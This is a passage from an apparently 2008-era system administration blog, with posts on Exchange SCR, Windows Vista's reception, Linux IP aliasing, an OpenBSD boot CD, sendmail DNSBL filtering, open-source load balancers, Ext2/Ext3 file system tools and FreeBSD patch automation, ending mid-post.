  • uptime - Gives you the uptime of the computer since it was last rebooted in seconds.
  • version - Gives the exact version string of the kernel currently running, including build date and gcc versions etcetera.
And here is a list of the main directories and what you can expect to find in there:
  • bus - Contains information about all the buses, hardware-wise, such as USB, PCI and ISA buses.
  • ide - Contains information about all of the IDE buses on systems that have IDE buses.
  • net - Some basic information and statistics about the different network systems compiled into the system.
  • scsi - This directory contains information about SCSI buses on SCSI systems.
  • sys - Contains lots of variables that may be changed, including the /proc/sys/net/ipv4 which will be deeply discussed in this document.
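As a quick illustration, a few of the files listed above can be read straight from a shell (assuming a Linux system with /proc mounted):

```shell
# Read a few of the /proc entries described above.
cpus=$(grep -c '^processor' /proc/cpuinfo)        # one "processor" line per CPU
read load1 load5 load15 procs lastpid < /proc/loadavg
echo "cpus=$cpus load1=$load1 load5=$load5 load15=$load15"
```

The exact values will of course differ from machine to machine.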

Wednesday, October 8, 2008

Plan an Exchange 2007 standby continuous replication (SCR) deployment

Microsoft added standby continuous replication (SCR) to its solutions in Exchange Server 2007 Service Pack 1 (SP1). SCR works similarly to local continuous replication (LCR) and cluster continuous replication (CCR) but has some limitations, such as a lack of support for automatic failover. Get an understanding of how standby continuous replication works within your Exchange environment and how to properly plan an SCR deployment.

Microsoft Exchange Server 2007 brought with it several new features, including local continuous replication and cluster continuous replication. These features use log shipping to store a secondary copy of the Exchange server database in an alternate location. That way, the server can be recovered quickly by retrieving data from the database replica in the event of a catastrophic failure.

Although LCR and CCR are great features, Microsoft went a step further in Exchange Server 2007 SP1 with standby continuous replication, which works similarly to LCR and CCR, but has some additional capabilities. SCR overcomes some of the limits of LCR and CCR. It may be tempting to begin using SCR immediately, but you should be aware of its significant limitations and restrictions. That's why it's crucial to properly plan an SCR deployment.

LCR requires that database replicas be stored locally; CCR lets you store database replicas on a different server, which must exist in the same subnet as the primary database server. With either feature, you can have only one replica.

SCR allows your primary mailbox server (source) to replicate its database to multiple standby servers (targets). These target servers can exist on your LAN, but that isn't necessary. The subnet limitation doesn't apply to SCR.

The first SCR limitation to be aware of is that, like LCR and CCR, SCR works by replicating an individual storage group. However, you can't replicate any storage group. Recovery storage groups are not supported, and the storage group that you're replicating can't contain more than one database.

While there is no limitation to the number of targets that a source storage group can be replicated to, Microsoft recommends that you limit the process to no more than four targets.

SCR and server roles

Although Microsoft recommends using a dedicated Exchange Server to host each server role, many companies choose to host multiple roles on a server because they lack the budget for a fully distributed deployment or they don't have enough users to justify having dedicated servers for each role. Because hosting multiple roles on a single Exchange Server is a common practice, it's important to understand how server roles work when SCR is implemented.

The roles that an SCR source server can host vary, depending on whether or not the server is clustered. If the source server is clustered, then it can only host the Mailbox Server role. If the source server isn't clustered, then the Mailbox Server role is required for SCR. However, the server can also optionally host the Client Access Server, Hub Transport Server or Unified Messaging (UM) Server roles.

The same basic rules apply to SCR target servers. The Mailbox Server role is always required, because it contains the necessary replication components. If the target isn't part of a cluster, it can optionally host the Client Access Server, Hub Transport Server, or Unified Messaging Server roles. In either case, LCR cannot be used on a target server.

If the target is part of a cluster, it should be designated as a passive node in a failover cluster, and the Mailbox Server role must be installed on a node where no other clustered mailbox server has been installed.

SCR and Exchange backups

One last limitation is related to backups. Many organizations use CCR to make the backup process more efficient. Backups can be run against a CCR replica without affecting the primary mailbox server. But unlike cluster continuous replication, you can't run a backup against a standby continuous replication target. You can, however, use CCR on an SCR host. This allows you to create a CCR replica of the primary database, run your backups against this replica and still reap SCR's benefits.





Monday, October 6, 2008

The top five reasons why Windows Vista failed

On Friday, Microsoft gave computer makers a six-month extension for offering Windows XP on newly-shipped PCs. While this doesn’t impact enterprise IT — because volume licensing agreements will allow IT to keep installing Windows XP for many years to come — the move is another symbolic nail in Vista’s coffin.

The public reputation of Windows Vista is in shambles, as Microsoft itself tacitly acknowledged in its Mojave ad campaign.

IT departments are largely ignoring Vista. In June (18 months after Vista’s launch), Forrester Research reported that just 8.8% of enterprise PCs worldwide were running Vista. Meanwhile, Microsoft appears to have put Windows 7 on an accelerated schedule that could see it released in 2010. That will provide IT departments with all the justification they need to simply skip Vista and wait to eventually standardize on Windows 7 as the next OS for business.

So how did Vista get left holding the bag? Let’s look at the five most important reasons why Vista failed.

5. Apple successfully demonized Vista

Apple’s clever I’m a Mac ads have successfully driven home the perception that Windows Vista is buggy, boring, and difficult to use. After taking two years of merciless pummeling from Apple, Microsoft recently responded with its I’m a PC campaign in order to defend the honor of Windows. This will likely restore some mojo to the PC and Windows brands overall, but it’s too late to save Vista’s reputation as a dud.

4. Windows XP is too entrenched

In 2001, when Windows XP was released, there were about 600 million computers in use worldwide. Over 80% of them were running Windows but it was split between two code bases: Windows 95/98 (65%) and Windows NT/2000 (26%), according to IDC. One of the big goals of Windows XP was to unite the Windows 9x and Windows NT code bases, and it eventually accomplished that.

In 2008, there are now over 1.1 billion PCs in use worldwide and over 70% of them are running Windows XP. That means almost 800 million computers are running XP, which makes it the most widely installed operating system of all time. That’s a lot of inertia to overcome, especially for IT departments that have consolidated their deployments and applications around Windows XP.

And, believe it or not, Windows XP could actually increase its market share over the next couple years. How? Low-cost netbooks and nettops are going to be flooding the market. While these inexpensive machines are powerful enough to provide a solid Internet experience for most users, they don’t have enough resources to run Windows Vista, so they all run either Windows XP or Linux. Intel expects this market to explode in the years ahead. (For more on netbooks and nettops, see this fact sheet and this presentation — both are PDFs from Intel.)

3. Vista is too slow

For years Microsoft has been criticized by developers and IT professionals for “software bloat” — adding so many changes and features to its programs that the code gets huge and unwieldy. However, this never seemed to have enough of an effect to impact software sales. With Windows Vista, software bloat appears to have finally caught up with Microsoft.

Vista has over 50 million lines of code. XP had 35 million when it was released, and since then it has grown to about 40 million. This software bloat has had the effect of slowing down Windows Vista, especially when it’s running on anything but the latest and fastest hardware. Even then, the latest version of Windows XP soundly outperforms the latest version of Windows Vista. No one wants to use a new computer that is slower than their old one.

2. There wasn’t supposed to be a Vista

It’s easy to forget that when Microsoft launched Windows XP it was actually trying to change its OS business model to move away from shrink-wrapped software and convert customers to software subscribers. That’s why it abandoned the naming convention of Windows 95, Windows 98, and Windows 2000, and instead chose Windows XP.

The XP stood for “experience” and was part of Microsoft’s .NET Web services strategy at the time. The master plan was to get users and businesses to pay a yearly subscription fee for the Windows experience — XP would essentially be the on-going product name but would include all software upgrades and updates, as long as you paid for your subscription. Of course, it would disable Windows on your PC if you didn’t pay. That’s why product activation was coupled with Windows XP.

Microsoft released Windows XP and Office XP simultaneously in 2001 and both included product activation and the plan to eventually migrate to subscription products. However, by the end of 2001 Microsoft had already abandoned the subscription concept with Office, and quickly returned to the shrink-wrapped business model and the old product development model with both products.

The idea of doing incremental releases and upgrades of its software — rather than a major shrink-wrapped release every 3-5 years — was a good concept. Microsoft just couldn’t figure out how to make the business model work, but instead of figuring out how to get it right, it took the easy route and went back to an old model that was simply not very well suited to the economic and technical realities of today’s IT world.

1. It broke too much stuff

One of the big reasons that Windows XP caught on was because it had the hardware, software, and driver compatibility of the Windows 9x line plus the stability and industrial strength of the Windows NT line. The compatibility issue was huge. Having a single, highly-compatible Windows platform simplified the computing experience for users, IT departments, and software and hardware vendors.

Microsoft either forgot or disregarded that fact when it released Windows Vista, because, despite a long beta period, a lot of existing software and hardware were not compatible with Vista when it was released in January 2007. Since many important programs and peripherals were unusable in Vista, that made it impossible for a lot of IT departments to adopt it. Many of the incompatibilities were the result of tighter security.

After Windows was targeted by a nasty string of viruses, worms, and malware in the early 2000s, Microsoft embarked on the Trustworthy Computing initiative to make its products more secure. One of the results was Windows XP Service Pack 2 (SP2), which won over IT and paved the way for XP to become the world’s most widely deployed OS.

The other big piece of Trustworthy Computing was the even-further-locked-down version of Windows that Microsoft released in Vista. This was definitely the most secure OS that Microsoft had ever released, but the price was user-hostile features such as UAC, a far more complicated set of security prompts that accompanied many basic tasks, and a host of software incompatibility issues. In other words, Vista broke a lot of the things that users were used to doing in XP.

Bottom line

There are some who argue that Vista is actually more widely adopted than XP was at this stage after its release, and that it’s highly likely that Vista will eventually replace XP in the enterprise. I don’t agree. With XP, there were clear motivations to migrate: bring Windows 9x machines to a more stable and secure OS and bring Windows NT/2000 machines to an OS with much better hardware and software compatibility. And, you also had the advantage of consolidating all of those machines on a single OS in order to simplify support.

With Vista, there are simply no major incentives for IT to use it over XP. Security isn’t even that big of an issue because XP SP2 (and above) are solid and most IT departments have it locked down quite well. As I wrote in the article Prediction: Microsoft will leapfrog Vista, release Windows 7 early, and change its OS business, Microsoft needs to abandon the strategy of releasing a new OS every 3-5 years and simply stick with a single version of Windows and release updates, patches, and new features on a regular basis. Most IT departments are essentially already on a subscription model with Microsoft so the business strategy is already in place there.

As far as the subscription model goes for small businesses and consumers, instead of disabling Windows on a user’s PC if they don’t renew their subscription, just don’t allow that machine to get any more updates if they don’t renew. Microsoft could also work with OEMs to sell something like a three-year subscription to Windows with every new PC. Then users would have the choice of renewing on their own after that.

Thursday, October 2, 2008

Setting up 2 IP addresses on one NIC (Redhat/Fedora)

STEP 1 (The settings for the initial IP address)
$ cat /etc/sysconfig/network-scripts/ifcfg-eth0

DEVICE=eth0
BOOTPROTO=static
BROADCAST=192.168.1.255
IPADDR=192.168.1.1

NETMASK=255.255.255.0
NETWORK=192.168.1.0
ONBOOT=yes


STEP 2 (2nd IP address: )
$ cat /etc/sysconfig/network-scripts/ifcfg-eth0:1

DEVICE=eth0:1
BOOTPROTO=static
BROADCAST=192.168.1.255
IPADDR=192.168.1.2
NETMASK=255.255.255.0
NETWORK=192.168.1.0
ONBOOT=yes


Note that in STEP 1 the filename is "ifcfg-eth0", whereas in STEP 2 it's "ifcfg-eth0:1"; also note the matching "DEVICE=..." entries. And, obviously, the "IPADDR" value is different as well.
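The STEP 2 file can also be generated from the shell with a here-document. A sketch (the file is written to the current directory here; on a real system, write it to /etc/sysconfig/network-scripts/ and then run "ifup eth0:1" as root to activate the alias without a reboot):

```shell
# Generate the ifcfg-eth0:1 alias file from STEP 2.
cat > ifcfg-eth0:1 <<'EOF'
DEVICE=eth0:1
BOOTPROTO=static
BROADCAST=192.168.1.255
IPADDR=192.168.1.2
NETMASK=255.255.255.0
NETWORK=192.168.1.0
ONBOOT=yes
EOF
grep '^IPADDR' ifcfg-eth0:1    # prints IPADDR=192.168.1.2
```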

Tuesday, September 23, 2008

Custom OpenBSD 4.3 bootable CD

Starting with the release of OpenBSD 4.2, cdrom42.fs is no longer provided on the official OpenBSD FTP sites. However, it is relatively easy to build a custom OpenBSD bootable installer CD. I will show you the steps for making your own OpenBSD bootable CD.

Create download directory.
shell> mkdir -p /OpenBSD

Download OPENBSD Files
shell> wget ftp://ftp.openbsd.org/pub/OpenBSD/4.3/i386/*

If the download is suddenly interrupted due to Internet connection problems, you can resume it with:
shell> wget -c ftp://ftp.openbsd.org/pub/OpenBSD/4.3/i386/*


Create cdrom43.fs
A Perl script called "geteltorito" is needed here: grab a copy, make it executable, and use it to extract the boot image from the file cdemu43.iso with a simple command.

shell > geteltorito cdemu43.iso > cdrom43.fs
Booting catalog starts at sector:29
Manufacturer of CD: Copyright (c) 2007 Theo
Image architecture: x86
Boot Media type is: 2.88meg floppy
El Torito image starts at sector 30 and has 5760 sector(s) of 512 Bytes
Image has been written to stdout.........

To Create Boot Image
shell> mkhybrid -r -b cdrom43.fs -c "boot.catalog" -o OpenBSD43.iso OpenBSD

By now, you should already have the OpenBSD43.iso and you can burn it to CD using any kind of operating system.


Sunday, September 21, 2008

10 reasons to migrate from Windows 2003 server to Windows 2008 server

1. Windows Server 2008 offers a world-class Web and application platform designed to provide security and ease of management for developing and reliably hosting enterprise applications and services.
2. The platform offers improved networking performance to harness the power of today’s multigigabit networks and help IT organizations secure and control network traffic.
3. Every aspect of Windows Server 2008 is designed with enhanced security and strict compliance in mind. For example, Network Access Protection features help enforce policies designed to ensure that any computer connecting to the network meets corporate requirements for system health.
4. By migrating to Windows Server 2008 now, organizations can maximize the OS cycle and take full advantage of the financial and technical benefits of powerful new functionality.
5. Windows Server 2008 provides outstanding control over remote infrastructure with enhancements to Microsoft Active Directory services, including read-only domain controllers and administrative role separations.
6. The platform provides simplified server management through the server manager console – a tool that helps streamline management of server configurations, status reporting, and role management.
7. Superior scripting and task automation enable IT organizations to automate common tasks and easily control system administration.
8. Windows Server 2008 supports presentation virtualization, enabling secure access to internal applications through firewall-friendly ports.
9. Hyper-V virtualization technology facilitates production server consolidations, fast disaster recovery, and simplified management of dynamic data centers.
10. Windows Server 2008 helps businesses leverage the power of the Windows Vista OS. The two platforms share several networking, storage, security, and management technologies.

Wednesday, September 17, 2008

Monitor Proftpd Server by Using phpftpwho

Install phpftpwho

Note: phpftpwho must be installed on the same machine that is running the Proftpd server.

Download phpftpwho by running the following command in the Apache document root folder (/var/www):

#wget http://www.rivetcode.com/files/phpftpwho/phpftpwho-1_05.tar.gz

Now extract the tar.gz file using the following command:

# tar xzvf phpftpwho-1_05.tar.gz

You should now have a phpftpwho folder in your Apache document root (/var/www).

To access phpftpwho, go to http://yourserverip/phpftpwho

Now log in to the FTP server and refresh the phpftpwho page; you should see the active FTP sessions listed.

Monday, September 15, 2008

Spam filtering in sendmail by using DNSBL definitions

If you wish to be even more aggressive with your spam filtering, you can configure Sendmail to completely ignore senders that have bad reputations. With this step, Sendmail won’t even talk to them.

Edit the file /etc/mail/sendmail.mc and insert the following lines anywhere in the FEATURE section of the file:

dnl #
dnl # Here are Sharky's favorite DNSBL definitions.
dnl #
FEATURE(`dnsbl', `list.dsbl.org')dnl
FEATURE(`dnsbl', `bl.spamcop.net')dnl
FEATURE(`dnsbl', `sbl.spamhaus.org')dnl
FEATURE(`dnsbl', `blackholes.mail-abuse.org')dnl
FEATURE(`dnsbl', `relays.mail-abuse.org')dnl

Apply the changes by saving the file and running the following commands:

cd /etc/mail
make all
/sbin/service sendmail restart

From this point on, every time an SMTP client connects to Sendmail, Sendmail will refer to the blacklist authorities you added to verify the client’s reputation. If the client is reported to have a shady reputation, Sendmail will hang up on it.
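Under the hood, each dnsbl FEATURE checks the connecting client by reversing the octets of its IP address and looking that name up in the blacklist zone; if the lookup returns an A record (typically in 127.0.0.0/8), the client is listed and the connection is rejected. A sketch of how the query name is built (203.0.113.45 is just an example address):

```shell
# Build the DNSBL query name: reverse the IP's octets, append the zone.
ip="203.0.113.45"
zone="bl.spamcop.net"
query=$(echo "$ip" | awk -F. -v z="$zone" '{print $4"."$3"."$2"."$1"."z}')
echo "$query"    # prints 45.113.0.203.bl.spamcop.net
```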

Monday, September 8, 2008

Opensource load balancing Software

Linux Virtual Server
The Linux Virtual Server Project is a project to cluster many real servers together into a highly available, high-performance virtual server. The LVS load balancer handles connections from clients and passes them on to the real servers (so-called Layer 4 switching) and can virtualize almost any TCP or UDP service, like HTTP, HTTPS, NNTP, FTP, DNS, ssh, POP3, IMAP4, SMTP, etc. It is fully transparent to the client accessing the virtual service.
Homepage: http://www.LinuxVirtualServer.org/

BalanceNG
BalanceNG is a modern software IP load balancing solution. It is small, fast, and easy to use and setup. It offers session persistence, different distribution methods (Round Robin, Random, Weighted Random, Least Session, Least Bandwidth, Hash, Agent, and Randomized Agent) and a customizable UDP health check agent in source code. It supports VRRP to set up high availability configurations on multiple nodes. It supports SNMP, integrating the BALANCENG-MIB with Net-SNMPD. It implements a very fast in-memory IP-to-location database, allowing powerful location-based server load-balancing.
Homepage:http://www.inlab.de/balanceng/

HAproxy
HAproxy is a high-performance and highly-robust TCP and HTTP load balancer which provides cookie-based persistence, content-based switching, advanced traffic regulation with surge protection, automatic failover, run-time regex-based header control, Web-based reporting, advanced logging to help trouble-shooting buggy applications and/or networks, and a few other features. Its own event-driven state machine achieves 20,000 hits per second and surpasses GigaEthernet on modern hardware, even with tens of thousands of simultaneous connections.
Homepage:http://haproxy.1wt.eu/

Pen
Pen is a load balancer for "simple" TCP-based protocols such as HTTP or SMTP. It allows several servers to appear as one to the outside. It automatically detects servers that are down and distributes clients among the available servers. This gives high availability and scalable performance.
Homepage:http://siag.nu/pen/

Crossroads Load Balancer
Crossroads is a daemon running in user space, and features extensive configurability, polling of back ends using wake up calls, status reporting, many algorithms to select the 'right' back end for a request (and user-defined algorithms for very special cases), and much more. Crossroads is service-independent: it is usable for any TCP service, such as HTTP(S), SSH, SMTP, and database connections. In the case of HTTP balancing, Crossroads can provide session stickiness for back end processes that need sessions but aren't aware of sessions on other back ends. Crossroads can be run as a stand-alone daemon or via inetd.
Homepage:http://crossroads.e-tunity.com/

balance
Balance is a simple but powerful generic TCP proxy with round-robin load balancing and failover mechanisms. Its behavior can be controlled at runtime using a simple command line syntax. Balance supports IPv6 on the listening side, which makes it a very useful tool for IPv6 migration of IPv4 only services and servers.
Homepage:http://www.inlab.de/balance.html

Distributor load balancer
Distributor is a software TCP load balancer. Like other load balancers, it accepts connections and distributes them to an array of back end servers. It is compatible with any standard TCP protocol (HTTP, LDAP, IMAP, etc.) and is also IPv6 compatible. It has many unique and advanced features and a high-performance architecture.
Homepage:http://distributor.sourceforge.net/

Pure Load Balancer
Pure Load Balancer is a high-performance software load balancer for the HTTP and SMTP protocols. It uses an asynchronous non-forking/non-blocking model, and provides fail-over abilities. When a backend server goes down, it automatically removes it from the server pool, and tries to bring it back to life later. Pure Load Balancer has full IPv6 support and works on OpenBSD, NetBSD, FreeBSD and Linux.
Homepage:http://plb.sunsite.dk/

Load Balancer Project
The Load Balancer Project is a tool that allows you to balance requests using clusters of servers. The goal is to achieve high availability load balancing with a simple configuration for the load balancer and the network topology. It leaves the servers untouched so the configuration only resides on the load balancer, and it allows you to manage any type of service via a plugin model design and a transparent proxy feature.
Homepage:http://www.jmcresearch.com/projects/loadbalancer/

mod_athena
mod_athena is an Apache-based application load balancer for large systems. It allows the HTTP server to act as a load balancer either internally to Apache's own mod_proxy (for reverse proxying), or externally to machines querying it. Arbitrary statistics are sent to the engine via a simple GET plus query-string interface, from which it will then make decisions based on chosen algorithms.
Homepage:http://ath.sourceforge.net/

udpbalancer
Udpbalancer is a reverse proxy that sorts UDP requests from your clients to your servers. It may operate in round-robin, volume balance, and load balance modes.
Homepage:http://dev.acts.hu/udpbalancer/

MultiLoad
MultiLoad is a load balancer that redirects HTTP requests to pre-defined servers/locations. It gives the provider a way to balance the traffic and hides the real download location. It allows you to manage different versions of each download. It is also a load balancing server extension: you can distribute files across several servers so that a download can be served from different servers. These servers can have different priorities to control the active traffic.
Homepage:http://download.laukien.com

Sunday, September 7, 2008

Why qmail? - Comparison of qmail with other MTAs

I am just giving the comparison of qmail with sendmail which is being widely used as MTA for the past few decades.

Qmail is a lightweight product, and unlike many other MTAs you don't have to run qmail as root. This is one of the best security features of qmail.

Qmail is much smaller than sendmail, and it lacks many of the features that most mail servers have today. It has no native support for RBLs, which sendmail does have. Also, unlike sendmail, qmail can't reject e-mail addressed to a mailbox that doesn't exist.

Qmail will accept the e-mail message, and then it will generate a "no such user" bounce internally. But these are just the standard features of qmail: a large number of add-ons and patches are available, and by applying them you can make qmail more powerful than any other MTA.

Qmail's security features are widely discussed and documented. Sendmail has been hacked, revised, and patched for years; its security vulnerabilities are an established and well-documented fact.

One of the nice features of Qmail is that it supports an alternate mail storage format, that’s directory-based, instead of one huge file containing all your messages. If you do a lot of POP3 serving, you can save a lot of CPU cycles and disk activity with Qmail.

Unfortunately, Pine does not natively support this storage format. But, again, there are patches for that out there.

Qmail has a problem if you are sending mail to multiple users of the same domain: unlike sendmail, qmail will connect multiple times, which may waste bandwidth.

Wednesday, September 3, 2008

Network visualization

The Interactive Network Active-traffic Visualization (INAV) is a monitoring tool that allows network administrators to monitor traffic on a local area network in real-time without overwhelming the administrator with extraneous data. The visualization tool can effectively perform a variety of tasks, from passively mapping a LAN to identifying recurring trends over time.

Currently, INAV supports Ethernet, IP, TCP, UDP, and ICMP. INAV is implemented using a client-server architecture that allows multiple administrators to easily view network traffic from different vantage points across the network.

Once established, the INAV server passively sniffs data from the network and dynamically displays activity between different nodes on the network while keeping statistics on bandwidth usage.

The current state of the network is stored and broadcast to the different INAV clients. The INAV client uses an intuitive, lightweight graphical user interface that can easily change views and orient on specific clusters of nodes.

Once a node on the network is selected, the client highlights any node that has sent traffic to or from that location. The client receives the current state of the network at a variable refresh rate that can be adjusted to limit INAV-generated communications on the network. Installation of the tool is straightforward and its operation is very intuitive. The INAV server runs on any Linux operating system with root privileges, while the client was developed in Java and can be run on most operating systems.

You can download INAV at inav.scaparra.com and a detailed white paper is available at inav.scaparra.com/docs/whitePapers/INAV.pdf.

Sunday, August 24, 2008

Ext2 and Ext3

As mentioned previously, Ext2 was the de facto file system for Linux. Although Ext2 lacks some advanced features, such as the extremely large files and extent-mapped files of XFS, JFS, and others, it is a reliable, stable file system that is still available out of the box in all Linux distributions. The real weakness of Ext2 is fsck: the bigger the Ext2 file system, the longer it takes fsck to run. Longer fsck times translate into longer down times.

Block Allocation in the Ext2 File System
When sequentially writing to a file, Ext2 preallocates space in units of eight contiguous blocks. Unused preallocation blocks are released when the file is closed, so space isn't wasted. This method prevents or reduces fragmentation, a condition under which many of the blocks in the file are spread throughout the disk because contiguous blocks aren't available. Contiguous blocks increase performance because when files are read sequentially there is minimal disk head movement.
Fragmentation of files (that is, the scattering of files into blocks that are not contiguous) is a problem that all file systems encounter. Fragmentation is caused when files are created and deleted. The fragmentation problem can be solved by having the file system use advanced algorithms to reduce fragmentation. The problem can also be solved by using the defrag file system utility, which moves the fragmented files so that they have contiguous blocks assigned to them. A defragmentation tool available for Ext2 is called defrag.ext2.
Creating an Ext2 File System
The program that creates Ext2 (and Ext3) file systems is called mke2fs. Two additional commands can be used to create an Ext2/Ext3 file system: mkfs.ext2 and mkfs -t ext2. The rest of this section looks at some of the key options that are available with the mkfs command:
• The -b block-size option specifies the block size in bytes. Valid block size values are 1024, 2048, and 4096 bytes per block.
• The -N number-of-inodes option specifies the number of inodes.
• The -T fs-type option specifies how the file system will be used. The valid options are as follows:
news creates one inode per 4KB block.
largefile creates one inode per megabyte.
largefile4 creates one inode per 4 megabytes.
For a complete listing of the options to mkfs.ext2, see the mkfs.ext2 man page.
The following example uses the defaults when issuing mkfs on the device /dev/hdb2. The block size defaults to 4096, and the number of inodes created is 502944.
# mkfs.ext2 /dev/hdb2

mke2fs 1.32 (09-Nov-2002)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
502944 inodes, 1004062 blocks
...

Next, set the block size to 1024 with the -b 1024 option, and set the file system type with the -T news option. The number of inodes created is 1005568.
# mkfs -t ext2 -b 1024 -T news /dev/hdb2

mke2fs 1.32 (09-Nov-2002)
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
1005568 inodes, 4016250 blocks
...
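The inode counts in these examples follow directly from the -T rules listed earlier. A rough back-of-the-envelope check, using the 4016250 one-kilobyte blocks from the output above (mke2fs rounds its allocations per block group, so the exact figures it reports differ slightly):

```shell
blocks=4016250        # from the mkfs output above
block_size=1024       # set with -b 1024
bytes=$((blocks * block_size))

# -T news: one inode per 4KB block
echo "news:       $((bytes / 4096)) inodes"
# -T largefile: one inode per megabyte
echo "largefile:  $((bytes / 1048576)) inodes"
# -T largefile4: one inode per 4 megabytes
echo "largefile4: $((bytes / 4194304)) inodes"
```

The news estimate (1004062) lands within half a percent of the 1005568 inodes mke2fs actually created.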

Ext3 Extensions for the Ext2 File System
The Ext3 file system provides higher availability without impacting the robustness (at least, the simplicity and reliability) of Ext2. Ext3 is a minimal extension to Ext2 to add support for journaling. Ext3 uses the same disk layout and data structures as Ext2, and it is forward- and backward-compatible with Ext2. Migrating from Ext2 to Ext3 (and vice versa) is quite easy; it can even be done in-place in the same partition. The other three journaling file systems require the partition to be formatted with their mkfs utility.
If you want to adopt a journaling file system but don't have free partitions on your system, Ext3 could be the journaling file system to use.
Kernel Configuration Support for Ext3
You can select Ext3 options from the File Systems section of the configuration menu and enable the following option:
Ext3 journaling file system support (CONFIG_EXT3_FS=y,m,n)

Click y next to the Ext3 entry if you want to build Ext3 into the kernel. Click m next to the Ext3 entry if you want to build Ext3 as a module. The n option is used if support for Ext3 is not needed.
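For reference, the resulting line in the kernel's .config looks like one of the following (the module build is shown uncommented here purely as an example; use the value that matches your choice):

```
# Built into the kernel:
# CONFIG_EXT3_FS=y
# Built as a module:
CONFIG_EXT3_FS=m
```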
Other options are available in the Ext3 selection for Ext3 configuration. If you need any of these options, select them here.
Working with Ext3
There are three ways to tune an Ext3 file system:
1. When the file system is created, which is the most efficient way
2. Through the tuning utility tune2fs, which can be used to tune the file system after it has been created
3. Through options that can be used when the file system is mounted
All three of these tuning options are discussed in the next sections.
Creating an Ext3 Partition
The program that creates Ext3 file systems is called mke2fs. You can also use the mkfs.ext3 and mkfs -t ext3 commands to create an Ext3 file system. The rest of this section looks at some of the key options that are available with the mkfs command:
• The -b block-size option specifies the block size in bytes. Valid block size values are 1024, 2048, and 4096 bytes per block.
• The -N number-of-inodes option specifies the number of inodes.
• The -T fs-type option specifies how the file system will be used. The valid options are as follows:
news creates one inode per 4KB block.
largefile creates one inode per megabyte.
largefile4 creates one inode per 4 megabytes.
For a complete listing of the options to mkfs.ext3, see the mkfs.ext3 man page.
The following example uses the default when issuing mkfs on the device /dev/sdb1. The block size is 1024, and the number of inodes created is 128016.
# mkfs.ext3 /dev/sdb1

mke2fs 1.28 (31-Aug-2002)
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
128016 inodes, 511984 blocks
...

After the Ext3 file system is formatted, it is good practice to eliminate the automatic checking of the file system (the file system is automatically checked every 23 mounts or 180 days, whichever comes first). To eliminate the automatic checking, use the tune2fs command with the -c option to set checking to 0.
# tune2fs -c 0 /dev/sdb1

tune2fs 1.28 (31-Aug-2002)
Setting maximal mount count to -1

Converting an Ext2 File System to Ext3
This section explains how to convert an Ext2 file system to Ext3:
1. Make a backup of the file system.
2. Add a journal file to the existing Ext2 file system you want to convert by running the tune2fs program with the -j option. You can run tune2fs on a mounted or unmounted Ext2 file system. For example, if /dev/hdb3 is an Ext2 file system, the following command creates the log:
# tune2fs -j /dev/hdb3

If the file system is mounted, a journal file named .journal is placed in the root directory of the file system. If the file system is not mounted, the journal file is hidden. (When you mount an Ext3 file system, the .journal file appears. The .journal file can indicate that the file system is indeed of type Ext3.)
3. Change the entry for /dev/hdb3 in the /etc/fstab file from ext2 to ext3.
4. Reboot and verify that the /dev/hdb3 partition has type Ext3 by typing mount and examining the output. The output should include an entry like the following:
# mount

/dev/hdb3 on /test type ext3 (rw)
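The fstab change in this conversion is a one-word edit to the file system type field. A minimal sketch of that edit, shown here against a hypothetical sample line rather than the live /etc/fstab:

```shell
# A sample fstab line for the partition being converted (hypothetical).
fstab_line='/dev/hdb3 /test ext2 defaults 1 2'

# Rewrite the file system type field from ext2 to ext3.
echo "$fstab_line" | sed 's/ ext2 / ext3 /'
# → /dev/hdb3 /test ext3 defaults 1 2
```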

Using a Separate Journal Device on an Ext3 File System
The first thing you need to do to use an external journal for an Ext3 file system is to issue the mkfs command on the journal device. The block size of the external journal must be the same block size as the Ext3 file system. In the following example, the /dev/hda1 device is used as the external log for the Ext3 file system:
# mkfs.ext3 -b 4096 -O journal_dev /dev/hda1

# mkfs.ext3 -b 4096 -J device=/dev/hda1 /dev/hdb1

Ext2/Ext3 Utilities
The e2fsprogs package contains various utilities for use with Ext2 and Ext3 file systems. The following is a short description of each utility:
• badblocks. Searches for bad blocks on a device.
• chattr. Changes the file attributes on an Ext2 or Ext3 file system.
• compile_et. Converts a table listing error-code names and associated messages into a C source file suitable for use with the com_err library.
• debugfs. A file system debugger for examining and changing the state of an Ext2 file system.
• dumpe2fs. Prints the superblock and block group information for the file system present on a specified device.
• e2fsck and fsck.ext2. Checks, and optionally repairs, an Ext2 file system.
• e2image. Saves critical Ext2 file system data to a file.
• e2label. Displays or changes the file system label on the Ext2 file system.
• fsck.ext3. Checks, and optionally repairs, an Ext3 file system.
• lsattr. Lists the file attributes on an Ext2 file system.
• mk_cmds. Takes a command table file as input and produces a C-source file as output, which is intended for use with the subsystem library, libss.
• mke2fs. Creates an Ext2 file system. mkfs.ext2 is the same as mke2fs.
• mkfs.ext3. Creates an Ext3 file system.
• mklost+found. Creates a lost+found directory in the current working directory on an Ext2 file system. mklost+found preallocates disk blocks to the directory to make it usable by e2fsck.
• resize2fs. Resizes Ext2 file systems.
• tune2fs. Adjusts tunable file system parameters on an Ext2 file system.

Wednesday, August 20, 2008

FreeBSD: Automate Security Patches

Keep up-to-date with security patches.
We all know that keeping up-to-date with security patches is important. The trick is coming up with a workable plan that ensures you're aware of new patches as they're released, as well as the steps required to apply those patches correctly.
Michael Vince created quickpatch to assist in this process. It allows you to automate the portions of the patching process you'd like to automate and manually perform the steps you prefer to do yourself.
Preparing the Script
quickpatch requires a few dependencies: perl, cvsup, and wget. Use which to determine if you already have these installed on your system:
% which perl cvsup wget

/usr/bin/perl

/usr/local/bin/cvsup

wget: Command not found.

Install any missing dependencies via the appropriate port (/usr/ports/lang/perl5, /usr/ports/net/cvsup-without-gui, and /usr/ports/ftp/wget, respectively).
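The which check above can be wrapped in a small loop that reports every missing prerequisite at once; here is a sketch using the POSIX command -v builtin:

```shell
# Check each of quickpatch's prerequisites and report any missing ones.
for cmd in perl cvsup wget; do
    if command -v "$cmd" >/dev/null 2>&1; then
        echo "$cmd: $(command -v "$cmd")"
    else
        echo "$cmd: NOT FOUND - install the corresponding port"
    fi
done
```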
Once you have the dependencies, download the script from http://roq.com/projects/quickpatch and untar it:
% tar xzvf quickpatch.tar.gz

This will produce an executable Perl script named quickpatch.pl. Open this script in your favorite editor and review the first two screens of comments, up to the #Stuff you probably don't want to change line.
Make sure that the $release line matches the tag you're using in your cvs-supfile:
